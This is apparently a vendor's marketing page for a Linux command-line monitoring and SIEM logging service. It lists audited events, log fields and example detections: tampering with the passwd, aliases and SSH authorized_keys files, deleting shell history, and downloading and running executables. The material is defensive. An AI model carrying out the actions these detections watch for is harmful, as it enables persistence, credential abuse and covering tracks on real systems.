As part of the increasing demand for visibility of the organization systems, some of the most significant black holes are the Linux\Unix activities and the ability to track them.
A large portion of the core components and critical systems in the organization will have a Linux operating system, for example:
Network components – Switches/routers FW \ IPS \ WAF
Virtualization – Vmware \ ESX \ Dockers
At Cyray`s, we have taken the essential data at all levels and developed unique new monitoring capabilities (Linux CLI).
OS Audit :
- Change passwords of existing accounts
- Unlock or un-expire locked or expired accounts
- Create new accounts
- Delete accounts
- Delete log files
- Change log files
- Delete or change system configuration files
- USB Drive connections
- Mount activities
Linux CLI:
We have developed a unique capability of collecting all the user’s commands that run on the operating system and receive them in the SIEM system with a log enriched with a lot of additional information. This allows us to provide our customers with a much more robust defense capability in addition to OS AUDIT:
Each Log will supply the following fields:
- Time
- Server name
- Username
- Command
- Execution path
- Operating system type
- SSH session
- SSH source address
- SSH source hostname
- Source Port
- Destination port
A few additional examples for monitoring capabilities developed by Cyray’s team and are used by our Customers::
- Dealing with ‘aliases’ file.
- Dealing with ‘passwd’ file.
- Dealing with SSH ‘authorization_keys’ file.
- History commands were deleted.
- The user created a simple HTTP server using Python.
- The user downloaded and ran an execution file
- from the Internet.